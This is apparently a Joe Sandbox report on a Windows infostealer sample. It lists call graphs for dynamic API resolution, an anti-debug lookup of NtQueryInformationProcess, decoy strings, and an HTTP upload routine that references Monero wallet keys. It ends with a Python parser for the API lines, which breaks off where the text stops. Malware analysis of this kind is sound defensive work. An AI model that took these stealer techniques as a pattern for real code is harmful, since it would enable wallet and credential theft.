RegQueryValueExA 15997->15998 15999 157780 RegCloseKey 15997->15999 15998->15999 16000 157793 15999->16000 16000->15996 16001->15882 16003 158a0c 16002->16003 16004 1589f9 GetProcessHeap HeapFree 16002->16004 16003->15916 16004->16003 16005->15916 16007 15a7a0 lstrcpy 16006->16007 16008 145119 16007->16008 16009 1447b0 2 API calls 16008->16009 16010 145125 16009->16010 16166 158ea0 16010->16166 16012 145184 16013 145192 lstrlen 16012->16013 16014 1451a5 16013->16014 16015 158ea0 4 API calls 16014->16015 16016 1451b6 16015->16016 16017 15a740 lstrcpy 16016->16017 16018 1451c9 16017->16018 16019 15a740 lstrcpy 16018->16019 16020 1451d6 16019->16020 16021 15a740 lstrcpy 16020->16021 16022 1451e3 16021->16022 16023 15a740 lstrcpy 16022->16023 16024 1451f0 16023->16024 16025 15a740 lstrcpy 16024->16025 16026 1451fd InternetOpenA StrCmpCA 16025->16026 16027 14522f 16026->16027 16028 1458c4 InternetCloseHandle 16027->16028 16029 158b60 3 API calls 16027->16029 16035 1458d9 ctype 16028->16035 16030 14524e 16029->16030 16031 15a920 3 API calls 16030->16031 16032 145261 16031->16032 16033 15a8a0 lstrcpy 16032->16033 16034 14526a 16033->16034 16036 15a9b0 4 API calls 16034->16036 16039 15a7a0 lstrcpy 16035->16039 16037 1452ab 16036->16037 16038 15a920 3 API calls 16037->16038 16040 1452b2 16038->16040 16047 145913 16039->16047 16041 15a9b0 4 API calls 16040->16041 16042 1452b9 16041->16042 16043 15a8a0 lstrcpy 16042->16043 16044 1452c2 16043->16044 16045 15a9b0 4 API calls 16044->16045 16046 145303 16045->16046 16048 15a920 3 API calls 16046->16048 16047->15993 16049 14530a 16048->16049 16050 15a8a0 lstrcpy 16049->16050 16051 145313 16050->16051 16052 145329 InternetConnectA 16051->16052 16052->16028 16053 145359 HttpOpenRequestA 16052->16053 16055 1458b7 InternetCloseHandle 16053->16055 16056 1453b7 16053->16056 16055->16028 16057 15a9b0 4 API calls 16056->16057 16058 1453cb 16057->16058 16059 15a8a0 lstrcpy 16058->16059 16060 1453d4 16059->16060 16061 15a920 3 API calls 
16060->16061 16062 1453f2 16061->16062 16063 15a8a0 lstrcpy 16062->16063 16064 1453fb 16063->16064 16065 15a9b0 4 API calls 16064->16065 16066 14541a 16065->16066 16067 15a8a0 lstrcpy 16066->16067 16068 145423 16067->16068 16069 15a9b0 4 API calls 16068->16069 16070 145444 16069->16070 16071 15a8a0 lstrcpy 16070->16071 16072 14544d 16071->16072 16073 15a9b0 4 API calls 16072->16073 16074 14546e 16073->16074 16167 158ead CryptBinaryToStringA 16166->16167 16168 158ea9 16166->16168 16167->16168 16169 158ece GetProcessHeap RtlAllocateHeap 16167->16169 16168->16012 16169->16168 16170 158ef4 ctype 16169->16170 16171 158f05 CryptBinaryToStringA 16170->16171 16171->16168 16175->15448 16418 149880 16176->16418 16178 1498e1 16178->15455 16180 15a740 lstrcpy 16179->16180 16353 15a740 lstrcpy 16352->16353 16354 150266 16353->16354 16355 158de0 2 API calls 16354->16355 16356 15027b 16355->16356 16357 15a920 3 API calls 16356->16357 16358 15028b 16357->16358 16359 15a8a0 lstrcpy 16358->16359 16360 150294 16359->16360 16361 15a9b0 4 API calls 16360->16361 16419 14988d 16418->16419 16422 146fb0 16419->16422 16421 1498ad ctype 16421->16178 16425 146d40 16422->16425 16426 146d63 16425->16426 16427 146d59 16425->16427 16441 146530 16426->16441 16427->16421 16431 146dbe 16431->16427 16451 1469b0 16431->16451 16433 146e2a 16433->16427 16434 146ee6 VirtualFree 16433->16434 16435 146ef7 16433->16435 16434->16435 16436 146f26 FreeLibrary 16435->16436 16437 146f38 16435->16437 16440 146f41 16435->16440 16436->16435 16439 1589f0 2 API calls 16437->16439 16438 1589f0 2 API calls 16438->16427 16439->16440 16440->16427 16440->16438 16442 146542 16441->16442 16444 146549 16442->16444 16461 158a10 GetProcessHeap RtlAllocateHeap 16442->16461 16444->16427 16445 146660 16444->16445 16450 14668f VirtualAlloc 16445->16450 16447 146730 16448 146743 VirtualAlloc 16447->16448 16449 14673c 16447->16449 16448->16449 16449->16431 16450->16447 16450->16449 16452 1469c9 16451->16452 16455 1469d5 16451->16455 
16453 146a09 LoadLibraryA 16452->16453 16452->16455 16454 146a32 16453->16454 16453->16455 16457 146ae0 16454->16457 16462 158a10 GetProcessHeap RtlAllocateHeap 16454->16462 16455->16433 16457->16455 16458 146ba8 GetProcAddress 16457->16458 16458->16455 16458->16457 16459 1589f0 2 API calls 16459->16457 16460 146a8b 16460->16455 16460->16459 16461->16444 16462->16460

                              Control-flow Graph

                              control_flow_graph 660 159860-159874 call 159750 663 159a93-159af2 LoadLibraryA * 5 660->663 664 15987a-159a8e call 159780 GetProcAddress * 21 660->664 666 159af4-159b08 GetProcAddress 663->666 667 159b0d-159b14 663->667 664->663 666->667 669 159b46-159b4d 667->669 670 159b16-159b41 GetProcAddress * 2 667->670 671 159b4f-159b63 GetProcAddress 669->671 672 159b68-159b6f 669->672 670->669 671->672 673 159b71-159b84 GetProcAddress 672->673 674 159b89-159b90 672->674 673->674 675 159bc1-159bc2 674->675 676 159b92-159bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00DD0ED8), ref: 001598A1
                              • GetProcAddress.KERNEL32(75900000,00DD0F50), ref: 001598BA
                              • GetProcAddress.KERNEL32(75900000,00DD0E18), ref: 001598D2
                              • GetProcAddress.KERNEL32(75900000,00DD0DD0), ref: 001598EA
                              • GetProcAddress.KERNEL32(75900000,00DD0E30), ref: 00159903
                              • GetProcAddress.KERNEL32(75900000,00DD8FC0), ref: 0015991B
                              • GetProcAddress.KERNEL32(75900000,00DC5220), ref: 00159933
                              • GetProcAddress.KERNEL32(75900000,00DC52E0), ref: 0015994C
                              • GetProcAddress.KERNEL32(75900000,00DD0EA8), ref: 00159964
                              • GetProcAddress.KERNEL32(75900000,00DD0F08), ref: 0015997C
                              • GetProcAddress.KERNEL32(75900000,00DD0E60), ref: 00159995
                              • GetProcAddress.KERNEL32(75900000,00DD0E90), ref: 001599AD
                              • GetProcAddress.KERNEL32(75900000,00DC51C0), ref: 001599C5
                              • GetProcAddress.KERNEL32(75900000,00DD0C68), ref: 001599DE
                              • GetProcAddress.KERNEL32(75900000,00DD0F38), ref: 001599F6
                              • GetProcAddress.KERNEL32(75900000,00DC5260), ref: 00159A0E
                              • GetProcAddress.KERNEL32(75900000,00DD0C98), ref: 00159A27
                              • GetProcAddress.KERNEL32(75900000,00DD0FF8), ref: 00159A3F
                              • GetProcAddress.KERNEL32(75900000,00DC5540), ref: 00159A57
                              • GetProcAddress.KERNEL32(75900000,00DD0FB0), ref: 00159A70
                              • GetProcAddress.KERNEL32(75900000,00DC54E0), ref: 00159A88
                              • LoadLibraryA.KERNEL32(00DD0FC8,?,00156A00), ref: 00159A9A
                              • LoadLibraryA.KERNEL32(00DD0F80,?,00156A00), ref: 00159AAB
                              • LoadLibraryA.KERNEL32(00DD0FE0,?,00156A00), ref: 00159ABD
                              • LoadLibraryA.KERNEL32(00DD1010,?,00156A00), ref: 00159ACF
                              • LoadLibraryA.KERNEL32(00DD1028,?,00156A00), ref: 00159AE0
                              • GetProcAddress.KERNEL32(75070000,00DD0F98), ref: 00159B02
                              • GetProcAddress.KERNEL32(75FD0000,00DD0F68), ref: 00159B23
                              • GetProcAddress.KERNEL32(75FD0000,00DD95F0), ref: 00159B3B
                              • GetProcAddress.KERNEL32(75A50000,00DD94D0), ref: 00159B5D
                              • GetProcAddress.KERNEL32(74E50000,00DC5340), ref: 00159B7E
                              • GetProcAddress.KERNEL32(76E80000,00DD8FE0), ref: 00159B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00159BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00159BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: c1e48967a19d1bbc3a3aa2c9adb80de59c177e593508aa07d8a93974b74800da
                              • Instruction ID: 61ec46bc70fd187eb7aa73fec4475670e342b88e77a0048d36cf58a1f0208c48
                              • Opcode Fuzzy Hash: c1e48967a19d1bbc3a3aa2c9adb80de59c177e593508aa07d8a93974b74800da
                              • Instruction Fuzzy Hash: 12A15AB5500B009FF746EFA8ED889663BFDF78C701F14459BB61583224D739A842EB22

                              Control-flow Graph

                              control_flow_graph 764 1445c0-144695 RtlAllocateHeap 781 1446a0-1446a6 764->781 782 1446ac-14474a 781->782 783 14474f-1447a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0014460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0014479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0014474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00144678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001445E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001446AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: dd474eb492dc5a2b9ffe2f5bb6cd618a5222f73994fbb93cb5d93d996085ea6c
                              • Instruction ID: 431258d665d3c1e471b981bdb90723637a88f4f1a413fd53def57a82c6d0708b
                              • Opcode Fuzzy Hash: dd474eb492dc5a2b9ffe2f5bb6cd618a5222f73994fbb93cb5d93d996085ea6c
                              • Instruction Fuzzy Hash: C141FF606C7746BBE738BFA68CE2E9D76675F42BCCF50504AA800522C0CBB065B0E527

                              Control-flow Graph

                              control_flow_graph 801 144880-144942 call 15a7a0 call 1447b0 call 15a740 * 5 InternetOpenA StrCmpCA 816 144944 801->816 817 14494b-14494f 801->817 816->817 818 144955-144acd call 158b60 call 15a920 call 15a8a0 call 15a800 * 2 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a920 call 15a8a0 call 15a800 * 2 InternetConnectA 817->818 819 144ecb-144ef3 InternetCloseHandle call 15aad0 call 149ac0 817->819 818->819 905 144ad3-144ad7 818->905 829 144ef5-144f2d call 15a820 call 15a9b0 call 15a8a0 call 15a800 819->829 830 144f32-144fa2 call 158990 * 2 call 15a7a0 call 15a800 * 8 819->830 829->830 906 144ae5 905->906 907 144ad9-144ae3 905->907 908 144aef-144b22 HttpOpenRequestA 906->908 907->908 909 144ebe-144ec5 InternetCloseHandle 908->909 910 144b28-144e28 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a9b0 call 15a8a0 call 15a800 call 15a920 call 15a8a0 call 15a800 call 15a740 call 15a920 * 2 call 15a8a0 call 15a800 * 2 call 15aad0 lstrlen call 15aad0 * 2 lstrlen call 15aad0 HttpSendRequestA 908->910 909->819 1021 144e32-144e5c InternetReadFile 910->1021 1022 144e67-144eb9 InternetCloseHandle call 15a800 1021->1022 1023 144e5e-144e65 1021->1023 1022->909 1023->1022 1024 144e69-144ea7 call 15a9b0 call 15a8a0 call 15a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00144915
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 0014493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00144ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00160DDB,00000000,?,?,00000000,?,",00000000,?,00DDEA90), ref: 00144DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00144E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00144E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00144E49
                              • InternetCloseHandle.WININET(00000000), ref: 00144EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00144EC5
                              • HttpOpenRequestA.WININET(00000000,00DDEB10,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00144B15
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • InternetCloseHandle.WININET(00000000), ref: 00144ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: b8e65e90584eb3bd591b75a424f2f224ba294f730ba4e03bce22569dfe001809
                              • Instruction ID: 42abcf06570d8c4eb43c5fe5b8c474cb509653de4c0696768f69ea2363a49f24
                              • Opcode Fuzzy Hash: b8e65e90584eb3bd591b75a424f2f224ba294f730ba4e03bce22569dfe001809
                              • Instruction Fuzzy Hash: E012EF71990118EADB15EB90DC62FEEB378BF24306F904299B51666091EF702F4DCF62
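The two function records above (the import resolver at 00159860 and the WinINet routine at 00144880) print their "APIs" entries in the order the IDA plugin found them, not in call order, which is why HttpOpenRequestA (ref 00144B15) is listed after the three InternetCloseHandle calls in the 00144880 record. The Python script below is an added example for this page, not Joe Sandbox code and not code recovered from the sample: it parses those "APIs" lines into records, recovers the call sequence by sorting on the call-site address, counts GetProcAddress resolutions per module handle for the resolver record, and decodes the HttpOpenRequestA dwFlags value 00400100 into its wininet.h bits. The embedded input is an excerpt copied from the two records; the flag table is assumed from wininet.h and covers only the common request flags.

```python
"""Parse the 'APIs' lines of Joe Sandbox function records into structured call data.

Added example for this report page; not Joe Sandbox code and not code from the sample.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One "APIs" line in the two shapes that occur on the page:
#   • HttpOpenRequestA.WININET(00000000,00DDEB10,?,...), ref: 00144B15
#   • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Excerpt copied from the 00159860 (import resolver) and 00144880 (WinINet) records above.
RESOLVER_LINES = """\
• GetProcAddress.KERNEL32(75900000,00DD0ED8), ref: 001598A1
• GetProcAddress.KERNEL32(75900000,00DD0F50), ref: 001598BA
• GetProcAddress.KERNEL32(75900000,00DC54E0), ref: 00159A88
• LoadLibraryA.KERNEL32(00DD0FC8,?,00156A00), ref: 00159A9A
• GetProcAddress.KERNEL32(76E80000,00DD8FE0), ref: 00159B9F
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00159BB6
"""
C2_LINES = """\
• Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
• Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00144915
• StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 0014493A
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00144ABA
• lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00144E04
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00144E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00144E49
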